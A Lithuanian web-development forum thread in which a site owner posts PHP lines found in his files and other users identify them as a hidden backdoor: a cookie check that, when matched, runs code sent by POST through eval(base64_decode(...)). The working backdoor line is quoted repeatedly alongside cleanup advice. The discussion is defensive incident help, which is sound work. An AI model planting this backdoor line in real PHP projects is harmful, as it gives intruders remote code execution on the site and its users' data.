Pereiti prie turinio

Ka daro toks kodas

Mr. P

Sukūrė Mr. P
Tinklalapių kūrimas

 Dalintis Sekėjai 0

Rekomenduojami pranešimai

Mr. P

Mr. P 950

Sukurta
Sukurta (redaguota) 

<?php if(md5($_COOKIE['4248c1554ad67c0f'])=="1d5fe8341e17c8b1a6a63aa299dc78b3"){  exit; } ?>

 

arba toks:

 

<?php if(md5($_COOKIE['67a0d696718997a8'])=="797332a302902ed1253d8034cda73152"){ eval(base64_decode($_POST['file'])); exit; } ?>

Redagavo Mr. P
Nuoroda į pranešimą
Dalintis kituose puslapiuose
crezzyman

crezzyman 123

Atrašyta
Atrašyta (redaguota)
<?php if(md5($_COOKIE['67a0d696718997a8'])=="797332a302902ed1253d8034cda73152"){ eval(base64_decode($_POST['file'])); exit; } ?>

 

Jeigu gerai pamenu eval turetu vykdyti koda esanti "$_POST['file']"

Cia kartai ne paliktas backdoor?

Man atrodo reiktu trinti sia eilute... na bet reikia ziureti visa koda....

Redagavo crezzyman
Nuoroda į pranešimą
Dalintis kituose puslapiuose
crezzyman

crezzyman 123

Atrašyta
Atrašyta (redaguota)
as kazkaip ir apie backdorus galvoju visokius.

 

 

nu ka toliau tikrinam kas grazaus gali but :)

 

Gal kas turit pasiulymu kur rast faila kuri jis cia vykdo ir t.t.

 

Cia vykdo ka jam perduoda POST metodu. Uzlenkti tinklapiui uztenka tu tavo eiluciu...

 

<?php if(md5($_COOKIE['67a0d696718997a8'])=="797332a302902ed1253d8034cda73152"){ eval(base64_decode($_POST['file'])); exit; } ?>

 

Bandyk trinti tokias eilutes.... O geriausia viska kur yra eval.

Tiesa eval daznai naudoja kai nori kad nuo temu nenutrintu autoriaus informacijos...

 

Jeigu nori atsiusk php faila supakaves(rar, zip) i az, paziuresiu kas per kodas...

 

 

EDIT:

 

Sita:

<?php if(md5($_COOKIE['67a0d696718997a8'])=="797332a302902ed1253d8034cda73152"){ eval(base64_decode($_POST['file'])); exit; } ?>

pakeisk i:

<?php if(md5($_COOKIE['67a0d696718997a8'])=="797332a302902ed1253d8034cda73152"){ echo'Error, f**k off'; exit; } ?>
Redagavo crezzyman
Nuoroda į pranešimą
Dalintis kituose puslapiuose
crezzyman

crezzyman 123

Atrašyta
Atrašyta (redaguota)
uzlenktu tai dar gerai butu, cia virusu primeta.

anskciau mesdavo ifr tai dar px rast imanoma, o dabar ...

krc reik viska istrynt pakiest passwordus ir t.t

per phpremote jauciu dirba...

 

tiesiog istrink tas eilutes kur yra su eval, ir nebegales php kodo vykdyti... kai viska gerai perziuresi ir istrinsi, tada pakeisk mysql... slaptazodzius.

Redagavo crezzyman
Nuoroda į pranešimą
Dalintis kituose puslapiuose
Mr. P

Mr. P 950

Atrašyta
  • Autorius
Atrašyta

gerai butu issikoduot i kur kreipiasi, butu lengviau rast :V

<?php if(md5($_COOKIE['fbee528449990c9c'])=="3d58132386729c891f267ec4e76c07ec"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['baea74ee9b5225e8'])=="91e8ff1df2893d1d1eebabbc091a4fb2"){ eval(base64_decode($_POST['file'])); exit; } ?>

Nuoroda į pranešimą
Dalintis kituose puslapiuose
JoKeRiS

JoKeRiS 32

Atrašyta
Atrašyta
gerai butu issikoduot i kur kreipiasi, butu lengviau rast :V

<?php if(md5($_COOKIE['fbee528449990c9c'])=="3d58132386729c891f267ec4e76c07ec"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['baea74ee9b5225e8'])=="91e8ff1df2893d1d1eebabbc091a4fb2"){ eval(base64_decode($_POST['file'])); exit; } ?>

 

I niekur nesikreipia. Tiesiog uzsetina cooki ir tik su tokiu cookiu kuris yra uzsetintas "fbee528449990c9c" vardu ir turi lygia reiksme su "3d58132386729c891f267ec4e76c07ec" md5 hashu leidzia postinti ir vykdit php koda. Crezyman gera buda parode, tiesiog vietoj eval parasyk "###### off".

Nuoroda į pranešimą
Dalintis kituose puslapiuose
crezzyman

crezzyman 123

Atrašyta
Atrašyta
gerai butu issikoduot i kur kreipiasi, butu lengviau rast :V

<?php if(md5($_COOKIE['fbee528449990c9c'])=="3d58132386729c891f267ec4e76c07ec"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['baea74ee9b5225e8'])=="91e8ff1df2893d1d1eebabbc091a4fb2"){ eval(base64_decode($_POST['file'])); exit; } ?>

 

Tai "hakeris" kreipiasi į failus kuriuose yra šie php skriptukai ir perduoda kenksminga php kodą.

 

Gal padės suprasti šitas pavyzdukas:

<?php

 

$code = 'echo rand(1,100);';

 

eval( $code );

die;

?>

<?php

 

$code = 'echo rand(1,100);';

 

echo $code;

die;

?>

Nuoroda į pranešimą
Dalintis kituose puslapiuose
osc

osc 6

Atrašyta
Atrašyta
gerai butu issikoduot i kur kreipiasi, butu lengviau rast :V

<?php if(md5($_COOKIE['fbee528449990c9c'])=="3d58132386729c891f267ec4e76c07ec"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['baea74ee9b5225e8'])=="91e8ff1df2893d1d1eebabbc091a4fb2"){ eval(base64_decode($_POST['file'])); exit; } ?>

 

Kodas nesikreipia niekur, esmė tokia: jeigu yra užsetinti kukiai tokiais pavadinimais kaip kode, tada paleidžia eval(base64_decode($_POST['file']));

 

O šis dalykas įvykdo POST metodu perduoto kintamojo 'file' kodą.

 

Trumpai tariant kenksmingas kodas perduodamas kintamuoju 'file' POST metodu.

Nuoroda į pranešimą
Dalintis kituose puslapiuose
JoKeRiS

JoKeRiS 32

Atrašyta
Atrašyta
Kodas nesikreipia niekur, esmė tokia: jeigu yra užsetinti kukiai tokiais pavadinimais kaip kode, tada paleidžia eval(base64_decode($_POST['file']));

 

O šis dalykas įvykdo POST metodu perduoto kintamojo 'file' kodą.

 

Trumpai tariant kenksmingas kodas perduodamas kintamuoju 'file' POST metodu.

 

Siaip as preistai ta pati sakiau..

Nuoroda į pranešimą
Dalintis kituose puslapiuose
  • Administratoriai
Arvydas

Arvydas 3.379

Atrašyta
  • Administratoriai
Atrašyta
Bandžiau paprasčiau paaiškint, o be to, po tavęs parašęs, nebuvo teisus.

 

Tiksliau, buvo nevisiškai tikslus.

O vietoje to išvedimo "echo'Error, f**k off'; exit; ", gal geriau pasidaryti įrašymą į koki failiuką, surašyti visa info apie "lankytoją" bei jo kenkėjišką kodą. Būtų įdomu pažiūrėti...

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Prisijunkite prie diskusijos

Jūs galite rašyti dabar, o registruotis vėliau. Jeigu turite paskyrą, prisijunkite dabar, kad rašytumėte iš savo paskyros.

Svečias
Parašykite atsakymą...

×   Įdėta kaip raiškusis tekstas.   Atkurti formatavimą

  Only 75 emoji are allowed.

×   Nuorodos turinys įdėtas automatiškai.   Rodyti kaip įprastą nuorodą

×   Jūsų anksčiau įrašytas turinys buvo atkurtas.   Išvalyti redaktorių

×   You cannot paste images directly. Upload or insert images from URL.

Įkraunama...
×
 Dalintis
Sekėjai 0
Eiti į temų sąrašą

  • Dabar naršo   0 narių

    Nei vienas registruotas narys šiuo metu nežiūri šio puslapio.

  • Prisijunk prie bendruomenės dabar!

    Uždarbis.lt nariai domisi verslo, IT ir asmeninio tobulėjimo temomis, kartu sprendžia problemas, dalinasi žiniomis ir idėjomis, sutinka būsimus verslo partnerius ir dalyvauja gyvuose susitikimuose.

    Užsiregistruok dabar ir galėsi:

    ✔️ Dalyvauti diskusijose;

    ✔️ Kurti naujas temas;

    ✔️ Rašyti atsakymus;

    ✔️ Vertinti kitų žmonių pranešimus;

    ✔️ Susisiekti su bet kuriuo nariu asmeniškai;

    ✔️ Naudotis tamsia dizaino versija;

    ir dar daugiau.

    Registracija trunka ~30 sek. ir yra visiškai nemokama.

  • Naujausios temos

  • Karštos temos

×
×
  • Pasirinkite naujai kuriamo turinio tipą...